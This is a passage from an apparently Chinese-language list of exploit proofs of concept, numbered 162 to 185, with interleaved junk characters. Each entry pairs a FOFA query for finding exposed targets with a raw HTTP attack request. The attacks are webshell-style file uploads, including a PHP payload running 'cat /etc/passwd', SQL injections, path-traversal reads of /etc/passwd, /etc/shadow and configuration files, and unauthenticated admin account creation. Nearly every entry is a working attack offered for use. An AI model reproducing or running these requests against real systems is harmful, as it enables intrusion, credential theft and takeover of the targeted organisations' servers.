. T6 t! C8 ^$ `+ ~' X<fileName>../../../../dizxdell.aspx</fileName>7 P# y4 l$ t" U b) N
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>9 Z/ I$ | O% v4 t& G+ \- Z# \
<tag>3</tag>: p8 Q5 L3 h" m9 h$ b8 U6 W" i
</UploadResume>
% h& X6 ?. ]/ R9 U! n$ ~% l</soap:Body>
/ s( Y, X& M, k7 b9 @8 `6 q0 q</soap:Envelope>
2 U8 \9 Q2 @. x" M
9 K% F4 g* V' p9 R4 s. O7 ~5 [
& x \ d; n7 Nhttp://x.x.x.x/dizxdell.aspx
% ^. f6 W7 o$ R" c: @+ E& O) g+ q R+ w- Q5 F* {
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传% J, @4 f: m: ]& ?
FOFA: app="和丰山海-数字标牌"
# N& w: h9 K7 z3 }POST /QH.aspx HTTP/1.1# N4 J0 y [- h- {
Host: x.x.x.x
7 g; `# P; N0 i: F9 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0! B& f# n: T: I* M, A3 K$ m
Connection: close
& B7 r5 e5 `; A/ M$ a' d. cContent-Length: 5832 {+ Q0 c' q" V9 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey/ X4 }; I4 t) K! w I
Accept-Encoding: gzip
3 i+ U7 ^5 `4 e9 T3 A& J! }- b
9 V5 L9 k) s Y------WebKitFormBoundaryeegvclmyurlotuey) z5 L: I9 r X! y+ w2 N
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"% D0 K! y! {9 m W0 n! Q C* b4 q2 \
Content-Type: application/octet-stream! `) q8 F3 a1 E, U; {
( @/ s, A3 R+ B/ O- ~* D! e<% response.write("ujidwqfuuqjalgkvrpqy") %>
A( v$ f) I) I------WebKitFormBoundaryeegvclmyurlotuey
8 d% p1 Q5 n J; X1 o8 o/ X/ ?Content-Disposition: form-data; name="action"7 n3 R: n7 u5 \; X/ i, m0 O
: t/ s$ ^4 H, L/ k* {# I
upload
& }, ~3 j1 w0 r; C7 z6 Z8 l8 S* r------WebKitFormBoundaryeegvclmyurlotuey
- E! m+ a! u$ y- m u9 i& F5 d( ^4 jContent-Disposition: form-data; name="responderId"4 {( T5 E- Z! r4 g$ X
7 j" h' T+ O7 a5 n1 U6 F
ResourceNewResponder. Z. b( H8 ^( _* R$ x9 W y2 T0 q8 u8 l
------WebKitFormBoundaryeegvclmyurlotuey$ K! x; Q/ m& t- m
Content-Disposition: form-data; name="remotePath"
: M& j% {1 v' p1 |# s9 G" Y- t/ v
/opt/resources2 R0 @6 i/ v0 X/ ~) I
------WebKitFormBoundaryeegvclmyurlotuey-- c5 F; U- P1 N! j4 E
7 j0 Z u) h; F0 y2 C! M" N% f
4 `8 l3 d( [" n+ p! o
http://x.x.x.x/opt/resources/kjuhitjgk.aspx' C: l, j1 n* o! E# \& |
" N4 N# ?& L3 D* y0 d
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
0 Z R3 a" o* O$ b% R+ n1 J: J* _4 @FOFA: icon_hash="-795291075"8 {) O, K( K1 D
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
7 q( _" L8 z- C7 { BHost: x.x.x.x+ I3 O m6 Y% u- l8 j$ \% b! h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.365 N' T& e% E }9 c n' k3 `
Connection: close% j; b8 M' d/ w- i2 L9 S5 A
Content-Length: 293
7 F4 ?% n) e# r2 n" r5 T" w9 [Accept: */*. Z/ O2 X9 n3 r
Accept-Encoding: gzip, deflate
3 @, U8 e+ V# f7 K6 G: C. S5 S! kAccept-Language: zh-CN,zh;q=0.9
% `. z! _+ u: }. DContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod& Z6 W$ j' K n# p$ M/ u' t
; g# H6 `% n$ Z$ t+ ^( L
------iiqvnofupvhdyrcoqyuujyetjvqgocod
/ N- ~$ m1 K" u1 a3 wContent-Disposition: form-data; name="name"9 f+ ?: w! ]8 C- B
B, k4 z w3 `, U
1.php
9 ?1 x/ L1 u9 q3 X7 r, k------iiqvnofupvhdyrcoqyuujyetjvqgocod
2 a$ z& N* B( `0 A2 V( rContent-Disposition: form-data; name="upfile"; filename="1.php"
$ f+ T }. c( i, ^& g" zContent-Type: image/jpeg
9 Z/ A0 k. @3 ?- F( M9 q8 s7 t. ]0 R, V- }, b' u
rvjhvbhwwuooyiioxega4 Z: S! p( z- C( I7 u- m& ~
------iiqvnofupvhdyrcoqyuujyetjvqgocod--) A$ n# Q1 Z/ l6 x0 |
* i6 |( Y4 R4 w
2 S4 Z7 C u# o4 x) \) O
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传9 l* J: D, p5 x6 L% {
FOFA: title="智慧综合管理平台登入"
, q( g' n5 i2 p! Z/ u$ @POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1% u/ _: ] r0 q0 M. H& s" a
Host: x.x.x.x$ ^. R: w* M5 m) z' q* ?; V. R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
( {: b. {6 x2 w3 ^9 f+ j0 M1 YContent-Length: 2881 D! W! f; O* n/ h9 a
Accept: application/json, text/javascript, */*; q=0.01
2 w+ A+ j8 n" p- rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
$ v- P6 y1 J. ?' H# QConnection: close
3 B. O; K- T, f3 _/ q" {0 lContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl3 H/ |4 z: A: ~! q- z9 ?
X-Requested-With: XMLHttpRequest* E: A l" w2 K* S4 O* I7 g
Accept-Encoding: gzip5 }$ @- ^$ @1 T* o# s, x
, H: G5 D" Z0 z. u
------dqdaieopnozbkapjacdbdthlvtlyl
+ |9 i3 a' I" } d4 J4 D0 L/ J0 DContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"- ?# d8 V1 V [4 k! L s
Content-Type: image/jpeg5 z/ C) a( K9 L- ^# S) a
/ r" I8 d% F) U5 U6 p; e<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
$ y0 n y" P6 |$ C' t3 ?, X K. s5 s------dqdaieopnozbkapjacdbdthlvtlyl--
2 o- t1 `! k0 e/ {$ {/ [- Q% Q% j3 y
2 V! _& |* g$ h S$ p
( h- z5 d" R1 z1 n0 y5 D& ohttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
7 q: o' {, \+ {+ V& N! P" i# G0 V" J: o8 z, c/ k
165. OrangeHRM 3.3.3 SQL 注入
9 G, T/ C1 T( l1 m& s7 MCVE-2024-36428/ t% l) A9 ^, d! x
FOFA: app="OrangeHRM-产品"
* O! l& k1 N, v- m, r. ~5 r/ a7 yURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))4 z% b7 C7 A: w$ ~3 c& N9 s
' d8 F" M$ z. `" R
, S z% v7 [- e166. 中成科信票务管理平台SeatMapHandler SQL注入) M! {% c* h2 t$ `! c% I* _% R
FOFA:body="技术支持:北京中成科信科技发展有限公司"& U I" I; A7 A* C N* n
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1" i5 A# o4 u# c4 ~
Host:
3 K c3 V' M% b+ A) }4 JPragma: no-cache' `1 T( z& v# I/ m
Cache-Control: no-cache
: \ e% I% ]7 c# y5 h/ D, X! [# u- TUpgrade-Insecure-Requests: 1
& ?, p5 ]7 V' ~) o+ \! ^3 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
4 p8 \; a6 N7 v/ e+ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
c) m) K, f; N9 v$ w0 bAccept-Encoding: gzip, deflate
( H% G8 y m1 d$ [0 JAccept-Language: zh-CN,zh;q=0.9,en;q=0.8$ C7 S) x; o7 o$ w+ @9 T7 X
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE* E' Y5 i- s4 A1 P6 Y
Connection: close* _- a8 C! i* r3 }
Content-Type: application/x-www-form-urlencoded
S4 q* c# j* z( x& n7 l TContent-Length: 89: `. g+ Q2 Y- h
1 E+ D+ O2 @# d, @1 M* `Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE; d. ~, e3 S2 c2 Q4 ]/ H+ `0 M3 l
3 q }5 `# |. s$ H! Y
$ N; l; m! z& G6 J1 i
167. 精益价值管理系统 DownLoad.aspx任意文件读取8 Z) v' U% V9 t6 c+ e
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
- W6 H D2 U% I1 G* V/ D5 ~) yGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.10 v3 ?* [1 h; r0 ^9 [0 A4 t
Host:
! h3 Z1 G* t3 I" d1 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( L u5 J6 d2 J9 m% h! ^
Content-Type: application/x-www-form-urlencoded) G' {; D6 I# D5 D# `
Accept-Encoding: gzip, deflate
9 y4 H' a* o' I4 e' X- LAccept: */*( c R) ]" _9 {: m( [2 P# I- h
Connection: keep-alive& D. d7 a% s6 W, v- Z0 J
8 e0 P5 s7 H3 t: j' u4 q2 T& F+ s7 D( W+ J
168. 宏景EHR OutputCode 任意文件读取/ `% @# ]9 j: U" n
FOFA:app="HJSOFT-HCM"
7 f9 c# A- E4 X1 s- P+ e# t, `4 }GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
9 o* N" S) s. uHost: your-ip
" m) h9 v1 t& j1 H+ J+ h1 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$ ]$ g- h: J9 K0 I7 l" B! Z, }, z
Content-Type: application/x-www-form-urlencoded4 m% ?& d+ y/ H1 ~6 V. c0 Q# Z
Connection: close% y3 H; X/ u$ ~' s5 [+ `7 ^* V8 k8 s( Z
% t# @- U. J+ f u! G
_( P1 p) M5 h' Z( t
% G5 ^0 `. D8 A; A( Q& H- w8 i& R169. 宏景EHR downlawbase SQL注入
0 ]9 `4 K; m. rFOFA:app="HJSOFT-HCM"
5 @; l) Q f* E' J) r4 MGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
/ O9 H7 m- Q% f. V+ F4 GHost: your-ip
. z! n+ z/ B+ C. Y( VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( T" n/ F0 F9 ?; ~
Accept: */*
: \2 s2 v7 w! C2 ~3 C/ O0 dAccept-Encoding: gzip, deflate L t5 J5 o) F6 Y" a4 V; A6 n
Connection: close
% h3 h9 M0 V% V; m" d, M
- ?7 L* C# ~# \! U: \ G4 f) P- N) o5 {2 }3 ^+ G
, v7 ^# G3 h. Y# r% g3 J! s170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* k$ I" R( w% ]; |FOFA:body="/general/sys/hjaxmanage.js"" Z! J! B, }; F, R% _2 B
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
1 k5 e$ O5 E# Y5 AHost: balalanengliang
6 O3 J: |* y5 M1 i* u3 B. I, vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* k3 V, W8 \! J xContent-Type: application/x-www-form-urlencoded9 `3 E7 w! N: s( b; q( l' E* B2 {/ s
6 ^4 P" U6 g$ @6 S
filename=../webapps/ROOT/WEB-INF/web.xml! p: R4 [# S* |4 t' k
+ v2 P9 } d* c% n" K
4 @0 J( N. P) w171. 通天星CMSV6车载定位监控平台 SQL注入
s7 F+ T( X8 t- P5 ^FOFA:body="/808gps/"* z5 m+ j5 I. w0 r
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1. K' L) N p& V3 n
Host: your-ip2 X, Y0 V# ~0 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. b% y2 c& a+ V+ `Accept: */*& V6 w) B1 A- T5 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 ~: H6 ]& K. d7 G
Accept-Encoding: gzip, deflate5 L- h! I7 @) W: o
Connection: close
; K) i" M2 j8 H6 x4 m: s% \% ] L" p6 ?5 K7 D3 @2 M$ v
' v# d2 U. ~/ N3 g- m$ J' H" c8 W
$ Y3 U9 x+ Q8 g# c+ O3 G% Y$ j172. DT-高清车牌识别摄像机任意文件读取% ]0 n) D3 o, {; s$ r
FOFA:app="DT-高清车牌识别摄像机"
. n+ ?% _9 j: A- Z) aGET /../../../../etc/passwd HTTP/1.1
( d6 x u, o- Y. H# K3 XHost: your-ip
+ }9 q T; O( ~6 C0 g# U+ M9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& Y; y* O, }, x
Accept-Encoding: gzip, deflate1 c# l! s- e* L" k+ z5 Z
Accept: */*1 Y; |" M9 E* _- U9 Q6 ?% V
Connection: keep-alive
7 T+ p6 t5 T8 ]* r. b- V& ?+ C% m( Z8 z8 w M" h
! o' o5 d/ b6 M9 s& u, a
% J* N u3 [" g: F2 m
173. Check Point 安全网关任意文件读取/ _8 B9 y! x1 h U
CVE-2024-24919
2 G% v8 w D3 A) |0 Z# kFOFA:app="Check_Point-SSL-Network-Extender"
0 i# H/ ]# \" z: D2 r$ q7 x1 iPOST /clients/MyCRL HTTP/1.19 [' i6 j, x: |9 T: T
Host: your-ip; i7 l. c# G- a# n: H
Content-Type: application/x-www-form-urlencoded
4 }/ x5 f* x: L/ o0 x( o
, E- u _& Y/ A. k4 d; u% ]1 ZaCSHELL/../../../../../../../etc/shadow* t, l( Q$ {& j% H- j6 ^
: M7 Y+ F! d8 H+ p2 y) A( b" Y
1 {; _$ H. S9 l( C _5 E/ _/ ?) X, @, h: w! c: g
174. 金和OA C6 FileDownLoad.aspx 任意文件读取) r! r1 y% P# \+ x7 v6 |6 y# j2 s, r
FOFA:app="金和网络-金和OA"
5 F; k/ @) |" A6 o1 [) xGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1! [( \: X/ O0 M# ^" q
Host: your-ip
% W: O v5 c1 |5 ^) O$ V; v0 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ a% k6 I7 j( {: W# D% S! [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. w+ y& I5 u) y3 O. t
Accept-Encoding: gzip, deflate, br3 |- I3 M. H8 `: i. x4 [. ?- F2 T
Accept-Language: zh-CN,zh;q=0.91 ^! e4 f) y; v7 }( x
Connection: close
/ b4 Q4 p4 H4 D3 Q5 L
" p+ a( o) j/ @0 |* }) I2 m
, R! o, O" G5 O0 d B2 F5 w( e) T0 X y" l c0 O
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ \* K8 A. {$ ]& R6 w* ?5 G
FOFA:app="金和网络-金和OA"
$ |# a/ Z' g8 M8 @; r, k! L/ lGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1; W& m6 V3 b/ w' Q$ y( N
Host:5 Z; J/ t% K: ?
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 J& w: D/ n2 d" E' Z, p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 ]' K& B" X" Q) F3 C6 N, t H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ c5 W$ Z5 V: w7 n2 j7 JAccept-Encoding: gzip, deflate2 n5 A# \1 J/ L( J
Connection: close, e& d j' m( x+ J: v1 e k' n8 U
Upgrade-Insecure-Requests: 1
4 v- ]. R2 Z5 S3 G( a! l4 T
# ^( ^# e# `" [' m
V0 P2 b( ^6 q+ [176. 电信网关配置管理系统 rewrite.php 文件上传
" d; N. W( w5 Z2 H5 p! u" W9 yFOFA:body="img/login_bg3.png" && body="系统登录"
8 ]1 q: j7 M0 r- D- z4 Z( ePOST /manager/teletext/material/rewrite.php HTTP/1.1
& E3 S# Y2 T/ GHost: your-ip, B, R- u& P1 B9 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; `" u/ o! b# p+ A3 H; U/ K$ v+ e; @8 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
& j7 i, z% f) ]( h' qConnection: close( a; }" L; J$ d
' p* |) {% F" Y5 M# i- K. I------WebKitFormBoundaryOKldnDPT
3 i4 v0 Z+ K2 i- |Content-Disposition: form-data; name="tmp_name"; filename="test.php"# E L) E! X0 g `( M! d2 k9 i
Content-Type: image/png
% r" @; ?0 A( b! T" t! f
2 _' F8 ~0 _' b& s1 i6 o<?php system("cat /etc/passwd");unlink(__FILE__);?>: C0 P6 o" E) T, o$ k( c# f
------WebKitFormBoundaryOKldnDPT
( Q4 I& ?/ z+ J$ dContent-Disposition: form-data; name="uploadtime"8 B4 w5 O# t. v8 ~% _0 q* W
4 |, c- O k3 p; W
$ h; j7 C5 u$ \6 n9 {" w2 v3 n------WebKitFormBoundaryOKldnDPT--! P* a% V, Q! ^/ P7 d( E: o* g! g
. z2 n4 A: [2 j, k4 X; J5 \ }
: C$ @4 l; N; n2 Z( B5 r. d! s8 w( _9 C, {
177. H3C路由器敏感信息泄露" A( S: y r/ M4 H% z) S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg9 ~/ M3 [6 F6 {2 ~3 |9 x' F1 Z5 x; D
/userLogin.asp/../actionpolicy_status/../M60.cfg1 ?! H6 u! P5 L1 `4 h
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
0 ]5 t1 c( L' g/ s b/userLogin.asp/../actionpolicy_status/../GR5200.cfg7 `4 L d! e8 G9 T1 z
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
# n5 k0 h9 R- J4 x/userLogin.asp/../actionpolicy_status/../GR2200.cfg8 L- y) \" [) v% X. c. L1 A6 M
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg/ K4 S- j! s7 E( V- @
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg% S2 L5 G' R$ y: Q3 X) T
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
; } U. c* [5 j l4 K Q/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg. }3 K+ k- y6 M, }% ~* U& ~
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
5 i- E( T: {+ B/userLogin.asp/../actionpolicy_status/../ER5100.cfg( _3 Z. y; @& g# S
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
. l0 y1 W" u& I6 z' A; _/userLogin.asp/../actionpolicy_status/../ER3260.cfg5 [" H6 r" _! n' D5 O; p
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
. {) f. }& o, C( P5 v; i3 k+ v/userLogin.asp/../actionpolicy_status/../ER3200.cfg' ^* P. l/ I' V5 {- |+ N
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg+ L- e! v {7 n! _9 u
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg) A8 q w* K1 H6 C" [
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg6 r+ ^1 ~9 q8 m9 U0 s: y
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
; c M1 g8 F$ P) L& W/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg1 Q0 }2 ]3 g: O; y: k0 |9 W. ^
# g4 M# ?, R9 ?$ [- s+ e( t+ U9 D
- R" ~$ N! R: R1 e/ }
178. H3C校园网自助服务系统-flexfileupload-任意文件上传# ^0 ]) f6 |4 l) _+ ]; V! x! a
FOFA:header="/selfservice"
0 \: v. B5 |3 [; ]6 `POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
# p/ P$ S) A2 V5 v. d% X/ YHost:" r( {# O* d& s. s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 N& {0 [" ] v4 ~3 n6 I N6 e
Content-Length: 252
: c, [* o5 s$ R' X5 y7 H1 ZAccept-Encoding: gzip, deflate5 ~2 L7 n( F _- X _! [
Connection: close- r# A/ ?0 g$ P( u
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
3 x0 V1 i8 A* X0 D+ v-----------------aqutkea7vvanpqy3rh2l
/ {: B2 a. z; s3 H4 X) [+ UContent-Disposition: form-data; name="12234.txt"; filename="12234"0 N5 u8 e& J \6 u& a9 Y4 Z
Content-Type: application/octet-stream
" E' ~; N8 I3 t+ V0 AContent-Length: 255
1 A+ B/ D( T: b$ m( r" @2 c W' \. O4 q; W: T
12234* y: b. l, o% N4 q$ m
-----------------aqutkea7vvanpqy3rh2l--2 |' E0 V& W) Q* F
9 U: W, d& a% K- u. j4 j. W& G
# z& Y% ]8 f, f) T7 f+ m+ K3 o% aGET /imc/primepush/%2e%2e/flex/12234.txt
2 x$ x# {! O; a& A: Y% o6 @- \. w- K, E+ L
Z" F: h# m# M8 j! c; s n
179. 建文工程管理系统存在任意文件读取
2 b7 A; Q8 M S2 j7 J N2 T7 oPOST /Common/DownLoad2.aspx HTTP/1.1 R& m3 f6 G9 f0 B+ J9 S
Host: {{Hostname}}2 I5 ]% v5 G F/ B& L4 g
Content-Type: application/x-www-form-urlencoded) _' Z& o' U7 }. K7 D" X, P' G f
User-Agent: Mozilla/5.0$ ?; r! C" E" ]
4 W! h1 l; q1 h9 N9 S2 Qpath=../log4net.config&Name=
8 }' R0 K$ l+ S! p7 s. Y0 v( v% i+ R9 h; t& e
; U Q3 U: o7 Q/ }. I; l& ]180. 帮管客 CRM jiliyu SQL注入
, S# T( L' E4 s. ]9 RFOFA:app="帮管客-CRM"8 o5 g& J( E7 M- F( m: A% k/ r
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1- r9 C4 |/ c) _! v3 t0 E
Host: your-ip, z9 V& l3 g& ~9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( K4 X. N1 f* g" i& \" S7 ?/ FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; `$ B. I V) \8 G( u
Accept-Encoding: gzip, deflate
4 }& K) ^: t/ h1 q+ J* bAccept-Language: zh-CN,zh;q=0.9
|2 O( N* a4 w: H* H, T9 A2 aConnection: close7 O. i- O( v& h b- ^
- s7 F# S) j1 Z$ b9 J( U! T
, Q8 ~, w) \- R1 y4 e Q! W3 c+ i$ R
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入' W$ s4 P9 k; }: s
FOFA:"PDCA/js/_publicCom.js"
! S7 g( @# W+ t& u9 XPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
4 ]; x( I# ?( Z& M9 p' c) xHost: your-ip( B. y5 s3 B9 T+ d2 ?6 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
~" d. Z" ]8 n8 Z7 U8 ]7 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 S' ], S6 J- t, O3 A, bAccept-Encoding: gzip, deflate, br& ^( U: U7 N5 N. x y' R/ r# b
Accept-Language: zh-CN,zh;q=0.9
6 E( S6 V- e7 }9 yConnection: close& D& t' n* j `. P
Content-Type: application/x-www-form-urlencoded8 c) R6 t( i! J2 G$ ^) F
( {8 ~+ b- r$ p9 x' O, I
7 {; `5 \9 d8 N1 \- F2 Zaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20, m5 S/ r" G# l# N, @* d3 T1 F
: V2 F2 j0 M5 E4 B) {+ a' ~/ O
9 d% J5 V A# a/ E# M/ g" c5 }
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建. y* s% V* J. s2 q
FOFA:"PDCA/js/_publicCom.js"
2 B. X& C) E( s- L, W4 Y" }POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1* U3 e; `, E4 s; ]1 W+ S
Host: your-ip& H; f% h8 u) ?+ J4 A k* T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 K# w" Z7 W4 f/ A6 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 |( F4 e: {9 Y( o: K; U' b
Accept-Encoding: gzip, deflate, br
2 b1 B z5 f. g8 Q% nAccept-Language: zh-CN,zh;q=0.91 c) ^ K& l6 e$ d
Connection: close, V5 J, [+ c+ H9 P
Content-Type: application/x-www-form-urlencoded
' ~1 J( ?& _, f2 h4 T5 r; e/ a
" K, x8 m% |( u
6 ~ I$ u. l, G$ i- Lusername=test1234&pwd=test1234&savedays=1/ d3 C y0 T6 F
! c+ p" Y" W( n9 R2 j) |5 \
1 {, z, j( x# J9 B O183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
6 m- Y" I4 S. @9 v/ gFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"8 X; v' D# _" K2 A9 M
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
4 d3 S! H0 N/ n! h! x1 u4 g7 BHost: your-ip
' ?5 B: i! r% W) W8 F# IUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
; c6 Q) p7 E+ jAccept-Charset: utf-8( {1 B4 J7 s/ D* y( n
Accept-Encoding: gzip, deflate" q- d l2 M3 L `" y
Connection: close
$ `# A1 H) g3 y6 W
# k# N& }) X3 B$ V2 l. E8 n* C2 W' i' r/ ^1 f1 _! U
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 w& u( O4 F* M6 G
FOFA:server="SunFull-Webs"* e Z. n& l- J. z& k( `
POST /soap/AddUser HTTP/1.1
1 s3 E3 e9 j) H$ z8 Y; ^. ZHost: your-ip
6 H4 g; z2 h5 m5 pAccept-Encoding: gzip, deflate
5 Z7 C8 X0 f) h" }& ~: eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 g: H* U- ?+ _7 q) LAccept: application/xml, text/xml, */*; q=0.01
# Y8 f# g/ u/ O9 U# a0 t$ aContent-Type: text/xml; charset=utf-87 r! W7 ^! ^$ R+ W% b3 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 F; W- E6 b9 b; {1 C# N" LX-Requested-With: XMLHttpRequest
* ` {/ j$ V. j" I+ S0 `' g% G+ C5 ^: m o, f3 G P" t* W
. G5 s+ H! i3 Y$ |+ Jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')0 j, ~6 v0 l. o1 G. i# f
& ?5 @. O* c Y& X- l6 l
( H; k* s: @& ] S* V. c185. 瑞友天翼应用虚拟化系统SQL注入
